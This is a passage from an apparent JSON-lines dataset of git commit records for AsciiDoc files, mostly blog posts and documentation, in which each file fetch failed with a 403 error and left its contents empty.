documentation\n","repos":"queeniema\/incubator-edgent,dlaboss\/incubator-edgent,queeniema\/incubator-edgent,queeniema\/incubator-edgent,dlaboss\/incubator-edgent,dlaboss\/incubator-edgent,dlaboss\/incubator-edgent,queeniema\/incubator-edgent","old_file":"src\/site\/asciidoc\/releasing.adoc","new_file":"src\/site\/asciidoc\/releasing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/queeniema\/incubator-edgent.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f23bfa651f5a3be7ff6b5ccca32c24c87b4e628d","subject":"y2b create post Unboxing The $4000 Razer Gaming Laptop","message":"y2b create post Unboxing The $4000 Razer Gaming Laptop","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-31-Unboxing-The-4000-Razer-Gaming-Laptop.adoc","new_file":"_posts\/2017-05-31-Unboxing-The-4000-Razer-Gaming-Laptop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09fa4229161032dd461232a3e9bc3e104caf71bc","subject":"Fix typo in the correct place","message":"Fix typo in the correct place\n","repos":"asashour\/framework,mstahv\/framework,mstahv\/framework,asashour\/framework,Darsstar\/framework,asashour\/framework,asashour\/framework,Darsstar\/framework,asashour\/framework,mstahv\/framework,Darsstar\/framework,Darsstar\/framework,mstahv\/framework,mstahv\/framework,Darsstar\/framework","old_file":"documentation\/articles\/IntegratingAnExistingGWTWidget.asciidoc","new_file":"documentation\/articles\/IntegratingAnExistingGWTWidget.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0d1ec42147e56d032ba66dc9cfacc2f3fa928451","subject":"Update 2015-01-31-Ruckblick-auf-den-5-Linux-Informationstag.adoc","message":"Update 2015-01-31-Ruckblick-auf-den-5-Linux-Informationstag.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2015-01-31-Ruckblick-auf-den-5-Linux-Informationstag.adoc","new_file":"_posts\/2015-01-31-Ruckblick-auf-den-5-Linux-Informationstag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"acf3767fde6d00384e9772f1f09a953368b98f9f","subject":"y2b create post The Dual Screen, Foldable Smartphone Is REAL!","message":"y2b create post The Dual Screen, Foldable Smartphone Is REAL!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-08-The-Dual-Screen-Foldable-Smartphone-Is-REAL.adoc","new_file":"_posts\/2017-11-08-The-Dual-Screen-Foldable-Smartphone-Is-REAL.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5bfb3a2cdf6e6e994f641451164d8aa6c329cc4f","subject":"Update 2010-07-14-Scala-280.adoc","message":"Update 2010-07-14-Scala-280.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2010-07-14-Scala-280.adoc","new_file":"_posts\/2010-07-14-Scala-280.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbf214eb4e10de68eea948777f49389c83bcecd7","subject":"Update 2016-10-17-algo-8986.adoc","message":"Update 2016-10-17-algo-8986.adoc","repos":"tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr","old_file":"_posts\/2016-10-17-algo-8986.adoc","new_file":"_posts\/2016-10-17-algo-8986.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tmdgus0118\/blog.code404.co.kr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ab80a7a0a62ed608972155cf41c3ef43c1a7b3c","subject":"Update 2016-11-08-Hello-you.adoc","message":"Update 2016-11-08-Hello-you.adoc","repos":"hayyuelha\/technical-blog,hayyuelha\/technical-blog,hayyuelha\/technical-blog,hayyuelha\/technical-blog","old_file":"_posts\/2016-11-08-Hello-you.adoc","new_file":"_posts\/2016-11-08-Hello-you.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hayyuelha\/technical-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7bc73f498056d7b9ae4420689eb54cb38d2ff8a9","subject":"y2b create post World's Loudest Bluetooth Speaker!","message":"y2b create post World's Loudest Bluetooth Speaker!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-04-Worlds-Loudest-Bluetooth-Speaker.adoc","new_file":"_posts\/2017-02-04-Worlds-Loudest-Bluetooth-Speaker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"915303437e15d23a6e0583e85747d843eee844df","subject":"y2b create post Sony MDR-570LP Headphones Unboxing \\u0026 Review","message":"y2b create post Sony MDR-570LP Headphones Unboxing \\u0026 Review","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-01-Sony-MDR570LP-Headphones-Unboxing-u0026-Review.adoc","new_file":"_posts\/2011-12-01-Sony-MDR570LP-Headphones-Unboxing-u0026-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4d0cb9a3047847f87037a963018850c8079ec6d","subject":"Update 2017-03-14-Workflow-Needs-slightly-pretentious-How-I-work.adoc","message":"Update 2017-03-14-Workflow-Needs-slightly-pretentious-How-I-work.adoc","repos":"thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io","old_file":"_posts\/2017-03-14-Workflow-Needs-slightly-pretentious-How-I-work.adoc","new_file":"_posts\/2017-03-14-Workflow-Needs-slightly-pretentious-How-I-work.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomaszahr\/thomaszahr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c67e1368c18933129fe0e9e52796e1dbdba1f70","subject":"Update 2016-11-17-NSUCRYPTO-2016.adoc","message":"Update 2016-11-17-NSUCRYPTO-2016.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_file":"_posts\/2016-11-17-NSUCRYPTO-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48b754b7e40d1baeebbeb959dfa072eef2db4352","subject":"y2b create post Is The LG V30 The Most Underrated Smartphone?","message":"y2b create post Is The LG V30 The Most Underrated Smartphone?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-03-Is-The-LG-V30-The-Most-Underrated-Smartphone.adoc","new_file":"_posts\/2018-02-03-Is-The-LG-V30-The-Most-Underrated-Smartphone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2405f0c2221d1f2a4ec45af376a586f2c9077e2","subject":"tep-1001: mark tests done","message":"tep-1001: mark tests done\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"todo\/tests.adoc","new_file":"todo\/tests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4ec6d0393745aab873be6a899cb780466cdaa856","subject":"Update 2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","message":"Update 2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","new_file":"_posts\/2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"72325366a4d611c6029b0427ace61a64ec7a4541","subject":"Update 2015-02-20-El-Gran-libro-de-HTML5-CSS3-y-JavaScript.adoc","message":"Update 2015-02-20-El-Gran-libro-de-HTML5-CSS3-y-JavaScript.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"_posts\/2015-02-20-El-Gran-libro-de-HTML5-CSS3-y-JavaScript.adoc","new_file":"_posts\/2015-02-20-El-Gran-libro-de-HTML5-CSS3-y-JavaScript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82365b0467aa8f5ea07fe2de74bdf674b3d5ddfd","subject":"Update 2016-04-04-Sin-espias.adoc","message":"Update 2016-04-04-Sin-espias.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Sin-espias.adoc","new_file":"_posts\/2016-04-04-Sin-espias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8414fda05d6572951b1c9f5cf808b7092df31724","subject":"Update 2017-05-19-swift-chat.adoc","message":"Update 2017-05-19-swift-chat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-swift-chat.adoc","new_file":"_posts\/2017-05-19-swift-chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff43832aecab9d97a2807be754f4d6898ace5641","subject":"Update 2015-07-12-Hi.adoc","message":"Update 2015-07-12-Hi.adoc","repos":"cherurg\/hubpress.io,cherurg\/hubpress.io,cherurg\/hubpress.io","old_file":"_posts\/2015-07-12-Hi.adoc","new_file":"_posts\/2015-07-12-Hi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cherurg\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"43b163085f142d542fb07cdae8ee6f2c01ca9a70","subject":"Fix objectfilter link","message":"Fix objectfilter link","repos":"joachimmetz\/artifacts,Onager\/artifacts,joachimmetz\/artifacts,pstirparo\/artifacts,ForensicArtifacts\/artifacts,pstirparo\/artifacts,ForensicArtifacts\/artifacts,Onager\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joachimmetz\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"48427551f593a5c04d6054ed416d815c9a1dade6","subject":"Update 2015-10-25-Deadlock-and-its-prevention.adoc","message":"Update 2015-10-25-Deadlock-and-its-prevention.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-25-Deadlock-and-its-prevention.adoc","new_file":"_posts\/2015-10-25-Deadlock-and-its-prevention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3bf8df4c5f5014617d48a5df5281d114c9022752","subject":"Update 2015-11-24-Borg-Deduplicating-Archiver.adoc","message":"Update 2015-11-24-Borg-Deduplicating-Archiver.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2015-11-24-Borg-Deduplicating-Archiver.adoc","new_file":"_posts\/2015-11-24-Borg-Deduplicating-Archiver.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2ed952e4a0c203804c6e65aed8baa5c646119b1","subject":"Create JavaDefensiveProgrammingTips.adoc","message":"Create JavaDefensiveProgrammingTips.adoc","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"JavaDefensiveProgrammingTips.adoc","new_file":"JavaDefensiveProgrammingTips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"9156f505e9adf8ef5029d448582442a7bcd7a164","subject":"Delete the file at '_posts\/2017-05-04-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc'","message":"Delete the file at '_posts\/2017-05-04-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc'","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-04-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc","new_file":"_posts\/2017-05-04-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a0e0de3ebefbc4f438170aca3f02f6e8c922855a","subject":"Update 2015-08-24-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 2015-08-24-copy-docker-images-from-one-docker-machine-to-another.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-24-copy-docker-images-from-one-docker-machine-to-another.adoc","new_file":"_posts\/2015-08-24-copy-docker-images-from-one-docker-machine-to-another.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e3bb6c8e483cf0c5c91629b79f88e74d10b16af","subject":"[Add] Blog post","message":"[Add] Blog post\n","repos":"skybon\/rigsofrods-website,skybon\/rigsofrods-website,skybon\/rigsofrods-website,skybon\/rigsofrods-website","old_file":"blog\/source\/blog\/2015-08-17-railway-switches-are-working-now\/index.adoc","new_file":"blog\/source\/blog\/2015-08-17-railway-switches-are-working-now\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skybon\/rigsofrods-website.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"285db40cf260cff114197b5d52e07a7a10a7e4fa","subject":"Update 2016-01-04-Blog-Title.adoc","message":"Update 2016-01-04-Blog-Title.adoc","repos":"ylliac\/ylliac.github.io,ylliac\/ylliac.github.io,ylliac\/ylliac.github.io","old_file":"_posts\/2016-01-04-Blog-Title.adoc","new_file":"_posts\/2016-01-04-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ylliac\/ylliac.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ce5ddfa0d6515dab03f47d04df9aced8d44afcb","subject":"Formatting changes","message":"Formatting changes\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d90acda768b7e2d640cf5dbe6e813b7f7a13c65d","subject":"Update 2016-04-19-N-I-X-porn.adoc","message":"Update 2016-04-19-N-I-X-porn.adoc","repos":"pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io","old_file":"_posts\/2016-04-19-N-I-X-porn.adoc","new_file":"_posts\/2016-04-19-N-I-X-porn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pyxozjhi\/pyxozjhi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5dc02d4de69a090f0564385a0803d42269f252a2","subject":"Update 2016-02-04-Inception.adoc","message":"Update 2016-02-04-Inception.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-02-04-Inception.adoc","new_file":"_posts\/2016-02-04-Inception.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ec6526c108769c42bb62dbcaacf2cd0bfdfd943","subject":"Update 2016-10-03-Animation.adoc","message":"Update 2016-10-03-Animation.adoc","repos":"3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io","old_file":"_posts\/2016-10-03-Animation.adoc","new_file":"_posts\/2016-10-03-Animation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/3991\/3991.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9eb9ab8c5b837d8d1bc64c701fce989b54c7ab5b","subject":"Update 2018-08-30-Exception.adoc","message":"Update 2018-08-30-Exception.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-30-Exception.adoc","new_file":"_posts\/2018-08-30-Exception.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7447c7a4c1da182bf6286e3c361526a8057d3c9b","subject":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","message":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"068dd73007e653bceac08bdea68709565cb5e6a2","subject":"Delete the file at '_posts\/2019-06-16-mind-fuck.adoc'","message":"Delete the file at '_posts\/2019-06-16-mind-fuck.adoc'","repos":"debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io","old_file":"_posts\/2019-06-16-mind-fuck.adoc","new_file":"_posts\/2019-06-16-mind-fuck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debbiezhu\/debbiezhu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dfa4a87b45fef11cd916a6c4ccd5d590c558d831","subject":"y2b create post OFFICIAL: Xbox One will support used games!","message":"y2b create post OFFICIAL: Xbox One will support used games!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-06-20-OFFICIAL-Xbox-One-will-support-used-games.adoc","new_file":"_posts\/2013-06-20-OFFICIAL-Xbox-One-will-support-used-games.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a133f70a40f13cc4e0dbf268410ad93c43478e2e","subject":"Update 2016-01-18-LTSP-Images-servidas-por-Servidor-de-Aula.adoc","message":"Update 2016-01-18-LTSP-Images-servidas-por-Servidor-de-Aula.adoc","repos":"iesextremadura\/iesextremadura.github.io,iesextremadura\/iesextremadura.github.io,iesextremadura\/iesextremadura.github.io","old_file":"_posts\/2016-01-18-LTSP-Images-servidas-por-Servidor-de-Aula.adoc","new_file":"_posts\/2016-01-18-LTSP-Images-servidas-por-Servidor-de-Aula.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iesextremadura\/iesextremadura.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30b2fd22069cf76066dcc57c92a63b565b501efd","subject":"Update 2016-09-12-Rhizosphere-metatranscriptome-analysis-1n.adoc","message":"Update 2016-09-12-Rhizosphere-metatranscriptome-analysis-1n.adoc","repos":"jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io","old_file":"_posts\/2016-09-12-Rhizosphere-metatranscriptome-analysis-1n.adoc","new_file":"_posts\/2016-09-12-Rhizosphere-metatranscriptome-analysis-1n.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jonathandmoore\/jonathandmoore.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a31e9393442fd7474ebd89dcd6659d6c03b5e8b0","subject":"Update 2015-05-04-New-post-1.adoc","message":"Update 2015-05-04-New-post-1.adoc","repos":"niole\/niole.github.io,niole\/niole.github.io,niole\/niole.github.io","old_file":"_posts\/2015-05-04-New-post-1.adoc","new_file":"_posts\/2015-05-04-New-post-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/niole\/niole.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc904a4409b4ba5192688f0d2742942d3d7d3cb5","subject":"Update 2017-03-24-First-Post.adoc","message":"Update 2017-03-24-First-Post.adoc","repos":"dfjs\/dfjs.github.io,dfjs\/dfjs.github.io,dfjs\/dfjs.github.io,dfjs\/dfjs.github.io","old_file":"_posts\/2017-03-24-First-Post.adoc","new_file":"_posts\/2017-03-24-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dfjs\/dfjs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66fd73070863231ef6dba2202078209acbe0e5ea","subject":"added the upgrade doc for 3.2.0 and added a section about GraphFilter and the two new GraphComputer methods. CTR.","message":"added the upgrade doc for 3.2.0 and added a section about GraphFilter and the two new GraphComputer methods. CTR.\n","repos":"robertdale\/tinkerpop,pluradj\/incubator-tinkerpop,jorgebay\/tinkerpop,artem-aliev\/tinkerpop,apache\/incubator-tinkerpop,mike-tr-adamson\/incubator-tinkerpop,apache\/incubator-tinkerpop,samiunn\/incubator-tinkerpop,jorgebay\/tinkerpop,BrynCooke\/incubator-tinkerpop,krlohnes\/tinkerpop,jorgebay\/tinkerpop,artem-aliev\/tinkerpop,artem-aliev\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,BrynCooke\/incubator-tinkerpop,apache\/tinkerpop,artem-aliev\/tinkerpop,pluradj\/incubator-tinkerpop,artem-aliev\/tinkerpop,apache\/incubator-tinkerpop,samiunn\/incubator-tinkerpop,krlohnes\/tinkerpop,mike-tr-adamson\/incubator-tinkerpop,robertdale\/tinkerpop,BrynCooke\/incubator-tinkerpop,robertdale\/tinkerpop,mike-tr-adamson\/incubator-tinkerpop,apache\/tinkerpop,apache\/tinkerpop,RussellSpitzer\/incubator-tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,krlohnes\/tinkerpop,velo\/incubator-tinkerpop,newkek\/incubator-tinkerpop,samiunn\/incubator-tinkerpop,robertdale\/tinkerpop,newkek\/incubator-tinkerpop,newkek\/incubator-tinkerpop,krlohnes\/tinkerpop,velo\/incubator-tinkerpop,velo\/incubator-tinkerpop,apache\/tinkerpop,RussellSpitzer\/incubator-tinkerpop,krlohnes\/tinkerpop,jorgebay\/tinkerpop,RussellSpitzer\/incubator-tinkerpop,pluradj\/incubator-tinkerpop","old_file":"docs\/src\/upgrade\/release-3.2.x-incubating.asciidoc","new_file":"docs\/src\/upgrade\/release-3.2.x-incubating.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/incubator-tinkerpop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b4d5f21085626d0dfe9888a13e89003bba61f44f","subject":"userguide: add invoice subsystem manual","message":"userguide: add invoice subsystem manual\n\nSigned-off-by: Pierre-Alexandre Meyer <ff019a5748a52b5641624af88a54a2f0e46a9fb5@mouraf.org>\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/invoice_subsystem.adoc","new_file":"userguide\/tutorials\/invoice_subsystem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"65af3f552c5f4e49ac38d7ede77c1e628a5028ca","subject":"y2b create post Sony Personal 3D Viewer Unboxing \\u0026 First Look","message":"y2b create post Sony Personal 3D Viewer Unboxing \\u0026 First Look","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-18-Sony-Personal-3D-Viewer-Unboxing-u0026-First-Look.adoc","new_file":"_posts\/2012-01-18-Sony-Personal-3D-Viewer-Unboxing-u0026-First-Look.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b3015095e09e16fffdbf634021af220c1eb0853","subject":"Update 2015-06-12-Questioning-Privacy-through-Public-Personal-Email.adoc","message":"Update 2015-06-12-Questioning-Privacy-through-Public-Personal-Email.adoc","repos":"esbrannon\/esbrannon.github.io,esbrannon\/esbrannon.github.io,esbrannon\/esbrannon.github.io","old_file":"_posts\/2015-06-12-Questioning-Privacy-through-Public-Personal-Email.adoc","new_file":"_posts\/2015-06-12-Questioning-Privacy-through-Public-Personal-Email.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/esbrannon\/esbrannon.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11cdd511f13213dfdb854577f0e08097dc9d84f9","subject":"Update 2015-05-01-Guten-Tag.adoc","message":"Update 